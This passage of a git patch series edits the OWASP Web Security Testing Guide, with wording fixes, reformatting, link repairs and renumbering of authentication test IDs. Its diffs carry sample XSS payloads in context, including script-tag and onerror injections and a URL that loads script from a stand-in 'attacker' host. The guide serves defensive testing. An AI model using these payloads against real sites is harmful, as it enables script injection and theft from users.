 ## References
 
 - [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/)
+
 - [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html)
+
 # Testing for DOM-Based Cross Site Scripting
 
 ## Summary
@@ -93,4 +93,4 @@ Manual testing should therefore be undertaken and can be done by examining areas
 
 ## Remediation
 
-For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https://
\ No newline at end of file
+For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).

From 4ca6ebd017b9db1ef14479f913962046ca9bb6ee Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 08:10:01 +0530
Subject: [PATCH 26/37] formatting mistake fixed (#591)

---
 .../19-Testing_for_Mass_Assignment.md                           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
index 3b11b0ee4d..c5debcc59b 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
@@ -94,7 +94,7 @@ If the application does not implement any control (e.g. list of allowed fields)
 #### Identify Sensitive Fields
 
 Since in black-box testing the tester does not have visibility on the source code, it is necessary to find other ways in order to gather information about the attributes associated to the objects.
-Analyze the responses received by the back end, in particular pay attention to:
+Analyze the responses received by the backend, in particular pay attention to:
 
 - HTML page source code
 - Custom JavaScript code

From 2ea1e4a37e6d8a26195d7923f1aa90f6aa4d667a Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 08:13:14 +0530
Subject: [PATCH 27/37] formatting mistake fixed (#591)

---
 .../01.1-Testing_for_Reflected_Cross_Site_Scripting.md          | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
index 0f156a6bb1..c4731fdaa3 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md
@@ -171,7 +171,7 @@ This is useful for filtering expressions like `<script src="http://attacker/xss.
 http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
 ```
 
-This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim website, `http://example/`.
+This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `http://example/`.
 
 #### Example 7: HTTP Parameter Pollution (HPP)
 

From b916869cc43988749259e156398fbb061c04d50f Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Sat, 1 Jul 2023 08:13:31 +0530
Subject: [PATCH 28/37] formatting mistake fixed (#591)

---
 .../01.3-Testing_for_DOM-based_Cross_Site_Scripting.md          | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
index 9a99d63cd4..ad3434a218 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
@@ -37,7 +37,7 @@ The [consequences](https://owasp.org/www-community/attacks/xss/) of DOM-based XS
 
 ## How to Test
 
-JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server. To understand what code is being executed, the website being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many websites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with.
+JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server. To understand what code is being executed, the site being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many sites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with.
 
 User input comes in two main forms:
 

From 209123f5d924af319324b61b4ccc445e2e9dc50d Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 17:54:31 +0530
Subject: [PATCH 29/37] Mistake caused by insuffitent new lines fixed

---
 .../01-Testing_for_Cross_Site_Scripting.md    | 21 ++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
index bc26715b24..1eee8236f7 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -20,29 +20,36 @@ An XSS attack occurs when an attacker can inject untrusted data into a web appli
 
 HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example:
 
+
 ```js
 <script>alert('XSS');</script>
 ```
 
+
 HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example:
 
+
 ```js
 <img src="x" onerror="alert('XSS')">
 ```
 
-JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example, 
+
+JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example:
+
 
 ```js
 var userInput = '<%= userInput %>';
-
 ```
 
-URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example,
+
+URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example:
+
 
 ```js
 https://example.com/search?q=<script>alert('XSS');</script>
 ```
 
+
 XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions.
 
 ## Test Objectives
@@ -61,34 +68,42 @@ Once the input fields or parameters are identified, the following techniques can
 
 HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: 
 
+
 ```js
 <script>alert('XSS');</script>
 ```
 
+
 If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser.
 
 Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: 
 
+
 ```js
 "><img src=x onerror=alert('XSS')>
 ```
 
+
 If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution.
 
 JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example: 
 
+
 ```js
 ');alert('XSS');//
 ````
 
+
 If the injected JavaScript code is not properly escaped or validated, it will be executed by the browser.
 
 URL Injection: Inject script payloads into URLs and check if they are executed. For example: 
 
+
 ```js
 https://example.com/search?q=<script>alert('XSS');</script>
 ```
 
+
 If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser.
 
 Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users.

From 907b73ca265bbbe63025897c14e09086cbccbf7a Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 17:55:15 +0530
Subject: [PATCH 30/37] Mistake caused by top level heading fixed

---
 .../01.3-Testing_for_DOM-based_Cross_Site_Scripting.md        | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
index ad3434a218..7543567ec2 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md
@@ -1,11 +1,11 @@
+# Testing for DOM-Based Cross Site Scripting
+
 ## References
 
 - [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/)
 
 - [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html)
 
-# Testing for DOM-Based Cross Site Scripting
-
 ## Summary
 
 [DOM-based cross-site scripting](https://owasp.org/www-community/attacks/DOM_Based_XSS) is the de-facto name for [XSS](https://owasp.org/www-community/attacks/xss/) bugs that are the result of active browser-side content on a page, typically JavaScript, obtaining user input through a [source](https://github.com/wisec/domxsswiki/wiki/sources) and using it in a [sink](https://github.com/wisec/domxsswiki/wiki/Sinks), leading to the execution of injected code. This document only discusses JavaScript bugs which lead to XSS.

From 9ea08015bc94ecddfdc2c088ec42937ad3e4f4ab Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 17:56:43 +0530
Subject: [PATCH 31/37] Mistake caused by insuffitent new lines fixed

---
 .../01-Testing_for_Cross_Site_Scripting.md       | 16 ----------------
 1 file changed, 16 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
index 1eee8236f7..2de7b8b1c4 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -20,36 +20,28 @@ An XSS attack occurs when an attacker can inject untrusted data into a web appli
 
 HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example:
 
-
 ```js
 <script>alert('XSS');</script>
 ```
 
-
 HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example:
 
-
 ```js
 <img src="x" onerror="alert('XSS')">
 ```
 
-
 JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. For example:
 
-
 ```js
 var userInput = '<%= userInput %>';
 ```
 
-
 URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example:
 
-
 ```js
 https://example.com/search?q=<script>alert('XSS');</script>
 ```
 
-
 XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions.
 
 ## Test Objectives
@@ -68,42 +60,34 @@ Once the input fields or parameters are identified, the following techniques can
 
 HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: 
 
-
 ```js
 <script>alert('XSS');</script>
 ```
 
-
 If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser.
 
 Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: 
 
-
 ```js
 "><img src=x onerror=alert('XSS')>
 ```
 
-
 If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution.
 
 JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example: 
 
-
 ```js
 ');alert('XSS');//
 ````
 
-
 If the injected JavaScript code is not properly escaped or validated, it will be executed by the browser.
 
 URL Injection: Inject script payloads into URLs and check if they are executed. For example: 
 
-
 ```js
 https://example.com/search?q=<script>alert('XSS');</script>
 ```
 
-
 If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser.
 
 Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users.

From effe070a820edb470bda660573bc58b9309cca76 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 17:59:34 +0530
Subject: [PATCH 32/37] Mistake caused by insuffitent new lines fixed

---
 .../01-Testing_for_Cross_Site_Scripting.md                | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
index 2de7b8b1c4..8dcff56c9d 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
@@ -58,7 +58,7 @@ The first step in XSS testing is to identify all user-supplied input fields or p
 
 Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities:
 
-HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: 
+HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example:
 
 ```js
 <script>alert('XSS');</script>
@@ -66,7 +66,7 @@ HTML Injection: Inject HTML tags and check if they are rendered as part of the w
 
 If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser.
 
-Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: 
+Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example:
 
 ```js
 "><img src=x onerror=alert('XSS')>
@@ -74,7 +74,7 @@ Attribute Injection: Inject special characters or event handlers into HTML attri
 
 If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution.
 
-JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example: 
+JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within `<script>` tags, inline event handlers, or within JavaScript variables. For example:
 
 ```js
 ');alert('XSS');//
@@ -82,7 +82,7 @@ JavaScript Injection: Inject JavaScript code into areas of the application where
 
 If the injected JavaScript code is not properly escaped or validated, it will be executed by the browser.
 
-URL Injection: Inject script payloads into URLs and check if they are executed. For example: 
+URL Injection: Inject script payloads into URLs and check if they are executed. For example:
 
 ```js
 https://example.com/search?q=<script>alert('XSS');</script>

From b068749cc0aa60799a1e85c473f2291d4c11fed2 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 18:06:13 +0530
Subject: [PATCH 33/37] Mistake caused by broken link fixed

---
 .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
index a17e08bfda..01795bc5d6 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
@@ -19,7 +19,7 @@ MySQL comes with at least four versions which are used in production worldwide,
 
 It should be noted that for MySQL versions before 4.0.x, only Boolean or time-based Blind Injection attacks could be used, since the subquery functionality or `UNION` statements were not implemented.
 
-From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the one described in the Section on [Testing for SQL Injection](05-Testing_for_SQL_Injection.md).
+From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the one described in the Section on [Testing for SQL Injection](03-Testing_for_SQL_Injection.md).
 
 `http://www.example.com/page.php?id=2`
 

From 84536e7bf429e8a2c807af1ae9359dd641e582d2 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 18:06:42 +0530
Subject: [PATCH 34/37] Mistake caused by Incorrect usage of the term fixed

---
 .../01.2-Testing_for_Stored_Cross_Site_Scripting.md             | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
index f0b57b5788..35b4c5a82a 100644
--- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md
@@ -4,7 +4,7 @@
 
 Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.
 
-Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the website and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
+Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
 
 This vulnerability can be used to conduct a number of browser-based attacks including:
 

From cd9010b84d256814833c9a708ea41e527131a5a1 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Mon, 3 Jul 2023 18:15:10 +0530
Subject: [PATCH 35/37] Mistake caused by roken link for case study is fixed by
 adding new case study link old one is not available anymore

---
 .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
index 01795bc5d6..fa5afe1247 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
@@ -224,4 +224,4 @@ For a complete list, refer to the [MySQL manual](https://dev.mysql.com/doc/refma
 
 ### Case Studies
 
-- [Zeelock: Blind Injection in MySQL Databases](https://archive.cert.uni-stuttgart.de/bugtraq/2005/02/msg00289.html)
+- [All Your Databases Belong To Me! A Blind SQLi Case Study](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study)

From 39e23bf60a5ac788570ef03d60ade1ca4a804e66 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Tue, 11 Jul 2023 12:58:45 +0530
Subject: [PATCH 36/37] ATHN-01 removed and added renamed to new numbers (#598)

---
 ...or_Credentials_Transported_over_an_Encrypted_Channel.md | 7 -------
 ...redentials.md => 01-Testing_for_Default_Credentials.md} | 2 +-
 ...hanism.md => 02-Testing_for_Weak_Lock_Out_Mechanism.md} | 2 +-
 ...d => 03-Testing_for_Bypassing_Authentication_Schema.md} | 2 +-
 ...d.md => 04-Testing_for_Vulnerable_Remember_Password.md} | 2 +-
 ...esses.md => 05-Testing_for_Browser_Cache_Weaknesses.md} | 2 +-
 ...rd_Policy.md => 06-Testing_for_Weak_Password_Policy.md} | 2 +-
 ....md => 07-Testing_for_Weak_Security_Question_Answer.md} | 2 +-
 ...g_for_Weak_Password_Change_or_Reset_Functionalities.md} | 2 +-
 ...ng_for_Weaker_Authentication_in_Alternative_Channel.md} | 2 +-
 ...cation.md => 10-Testing_Multi-Factor_Authentication.md} | 4 ++--
 11 files changed, 11 insertions(+), 18 deletions(-)
 delete mode 100644 document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{02-Testing_for_Default_Credentials.md => 01-Testing_for_Default_Credentials.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{03-Testing_for_Weak_Lock_Out_Mechanism.md => 02-Testing_for_Weak_Lock_Out_Mechanism.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{04-Testing_for_Bypassing_Authentication_Schema.md => 03-Testing_for_Bypassing_Authentication_Schema.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{05-Testing_for_Vulnerable_Remember_Password.md => 04-Testing_for_Vulnerable_Remember_Password.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{06-Testing_for_Browser_Cache_Weaknesses.md => 05-Testing_for_Browser_Cache_Weaknesses.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{07-Testing_for_Weak_Password_Policy.md => 06-Testing_for_Weak_Password_Policy.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{08-Testing_for_Weak_Security_Question_Answer.md => 07-Testing_for_Weak_Security_Question_Answer.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md => 08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md => 09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md} (99%)
 rename document/4-Web_Application_Security_Testing/04-Authentication_Testing/{11-Testing_Multi-Factor_Authentication.md => 10-Testing_Multi-Factor_Authentication.md} (99%)

diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md
deleted file mode 100644
index cc00ac98b7..0000000000
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel.md
+++ /dev/null
@@ -1,7 +0,0 @@
-# Testing for Credentials Transported over an Encrypted Channel
-
-|ID          |
-|------------|
-|WSTG-ATHN-01|
-
-This content has been merged into: [Testing for Sensitive Information Sent via Unencrypted Channels](../09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md)
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md
index 75c413353a..a12b0fae78 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Default_Credentials.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-02|
+|WSTG-ATHN-01|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md
index c4af512399..31736f497f 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Weak_Lock_Out_Mechanism.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-03|
+|WSTG-ATHN-02|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md
index 3396316d24..91f1932b0a 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Bypassing_Authentication_Schema.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-04|
+|WSTG-ATHN-03|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md
index 608f228019..e9a15bcabe 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Vulnerable_Remember_Password.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-05|
+|WSTG-ATHN-04|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md
index 4fae32d5ff..8faebf28c0 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Browser_Cache_Weaknesses.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-06|
+|WSTG-ATHN-05|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md
index 2df8511c18..3f5e62332d 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Weak_Password_Policy.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-07|
+|WSTG-ATHN-06|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md
index 3e62d1a85e..eac95a52ca 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Security_Question_Answer.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-08|
+|WSTG-ATHN-07|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md
similarity index 99%
